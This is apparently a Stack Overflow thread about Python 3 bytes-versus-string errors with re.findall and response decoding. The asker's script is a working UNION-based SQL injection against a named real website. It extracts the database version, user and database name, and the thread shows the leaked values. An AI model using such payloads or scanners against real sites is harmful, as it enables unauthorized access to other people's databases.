re.findall() and unicode like error in python 3

Question

I'm using python 3.3.0 in Windows 8. Below code successfully runs in python 2.7.x

import re, urllib
import urllib.request

arg_end = "--"
url = "http://www.johandemeij.com/post.php?id=276+AND+1=2+UNION+SELECT+1,2,p0w3R,4,p0w3R,p0w3R,7,8,p0w3R,p0w3R--"

url = site.replace("p0w3R","concat(0x1e,0x1e,version(),0x1e,user(),0x1e,database(),0x1e,0x20)")+arg_end

requrl = urllib.request.Request(url)

response = urllib.request.urlopen(requrl)

source = response.read()

match = re.findall("\x1e\x1e\S+", str(source))

print("match>>>", match)

In this script, I'm getting no value in match variable! And when I'm using this:

match = re.findall("\x1e\x1e\S+", source)

It gives me error like:

TypeError: can't use a string pattern on a bytes-like object

In-fact, when I'm injecting url in the browser, I'm getting result like below in particular vulnerable column. 5.1.61-0+squeeze1johan@localhostjohan_db

So, what's wrong with that re or what should I change and where? When I tried to read about \x in re module of python docs, I found nothing! or may be, I failed to get it. I appeal you to suggest me something with an example regarding this, if it's available in easy way to understand.

One more thing when I tried to convert 1e into string it gave nothing!

I have just started to learn python 3 and instead of writing simple programs, I really want to create some useful scripts. So, I'm trying to get my hands dirty in making simple SQLi scanner in python 3. I got inspiration from darkMySQLi tool.

jfs · Accepted Answer · 2012-10-26T23:00:59.863

0

By default ordinary string literals "" are bytestrings in Python 2, but they are Unicode strings in Python 3. b"" creates a bytestring in both versions.

Read about the difference between bytes and strings (Unicode) in Python.

You could use urllib.parse.urlencode({'id': '276 AND ...'}) to construct the url query, decode source bytes to Unicode using source.decode(encoding) (how to find the character encoding depends on content-type). For example, if there is charset parameter in the Content-Type http header:

import cgi

# extract encoding from Content-Type and print the response
_, params = cgi.parse_header(response.headers.get('Content-Type', ''))
print(response.read().decode(params['charset']))

edited Oct 26 '12 at 23:00

answered Oct 25 '12 at 21:38

jfs

399,953
195
994
1,670

Thanks for reply and sorry for being late because I was trying to get what you have told. When I made change like this: `source = response.read().decode('utf-8')` I got something like this in match variable: `['\x1e\x1e5.1.61-0+squeeze1', '\x1e\x1e5.1.61-0+squeeze1', '\x1e\x1e5.1.61-0+squeeze1']` But this is not what I have expected! Why it's failed to get full path/content? And yeah, still have confusion in bytes and string! So, can you please elaborate this? And would please show me an example of urllib.parse.urlencode() becaue I already read the python docs but still no idea! – magneto Oct 25 '12 at 22:32
@magneto: I've updated the answer. The result `['\x1e\x1e5.1.61-0+squeeze1', ...]` makes sense considering your code `re.findall("\x1e\x1e\S+", source.decode())`. What do you expect instead? Add it to you question. – jfs Oct 25 '12 at 22:55
Hey, I got the point and also got correct result like: `['\x1e5.1.61-0+squeeze1', '\x1ejohan@localhost', '\x1ejohan_db', ...]` But now the ques. is it's list. And I want that first 3 things only from that. So, how to get only `5.1.61-0+squeeze1` , `johan@localhost` , `johan_db` I tried `.split("\x1e")` method several ways but failed. :( Any idea on this? – magneto Oct 25 '12 at 23:08
It seems that you misunderstood me. Now, I got `['5.1.61-0+squeeze1', 'johan@localhost', 'johan_db', ...]` Ok, it seems nice. But what about splitting that list? I want to print that first 3 elements individually in my script. Let me make my point crystal clear. I want to print like: `Version = 5.1.61-0+squeeze1` `User = johan@localhost` `Database = johan_db` – magneto Oct 25 '12 at 23:23
@magneto: the result is already a list. If you don't know how to enumerate individual items in a list; [read tutorial](http://docs.python.org/py3k/tutorial/datastructures.html). – jfs Oct 25 '12 at 23:29
Oops, it seems like I'm being n00b. I could have used list like `match[0]`, `match[1]`, etc. to print the value. Yup, I got it! Can I trouble you more? What about this issue in python 3. `LookupError: unknown encoding: hex` – magneto Oct 25 '12 at 23:36
@magneto: [Decode Hex String in Python 3](http://stackoverflow.com/q/3283984/4279) – jfs Oct 25 '12 at 23:54
Hey, but it's not working! When I tried: `s = "nothing"` `bytes.fromhex(s).decode('utf-8')` It gave me an error like `ValueError: non-hexadecimal number found in fromhex() arg at position 0` So, now what's the solution? – magneto Oct 26 '12 at 00:08
@magneto: it is a very basic question. Have you tried to read the docs for bytes.fromhex() function? You could [ask it as a separate question](http://stackoverflow.com/questions/ask) so that google could help the next person after you though it is probably already answered multiple times. – jfs Oct 26 '12 at 00:40
Hmn, I know it's very basic. I tried to read python docs but it sucks! Anyway, I want to encode my string into hex like python 2 have this ready-made function .encode("hex") Let me compile my research regarding this and I will ask que. – magneto Oct 26 '12 at 09:35
Hey, one more doubt! I found this:`source = response.read().decode('utf-8')` is not working when website has this:`iso-8859-1` or any other `charset`. So, how to deal with multiple charset? Don't say manually change it in the source! or read python docs because I think python docs are really confusing! I believe that it will be best to learn from experienced guys instead. – magneto Oct 26 '12 at 13:22
1

@magneto: To convert to/from hex (bytes) you could use base64.b16encode/.b16decode functions. Determening character encoding is complicated in general case if Content-Type http header has no `charset` parameter. You could use a http client library that tries to guess automatically such as [requests](http://docs.python-requests.org/en/latest/). If the Python docs are too hard to understand for you; start with a simpler book such as http://learnpythonthehardway.org/ – jfs Oct 26 '12 at 22:54
@Sebastian . Now, I think you got my question. SO, again is there any way to fetch/identify the charset of the provided website? Because I have to decode the correct charset of website in my script, then only I will get the contents by using re.findall() function. Without identifying correct charset I'm getting no value in my match variable. I hope you can understand me and you would be feeling that it's an appropriate question! And I have so many doubts! Can I have your email-id please? because I think this is not the appropriate place to talk more. – magneto Oct 27 '12 at 14:22
1

@magneto: 1. Reread my last comment and look at the answer. 2. Your initial error was TypeError. If it is not the case you should [reflect it in your question](http://stackoverflow.com/posts/13076374/edit) or ask a new one (limit the scope of your question). A comment is not the appropriate place to put new info about your question – jfs Oct 27 '12 at 17:54
Hmn, Yup, okay. I will make a new question by doing more and in-depth research. Anyway, I have clearly mentioned "re.findall and unicode like error". – magneto Oct 27 '12 at 20:10

re.findall() and unicode like error in python 3

1 Answers1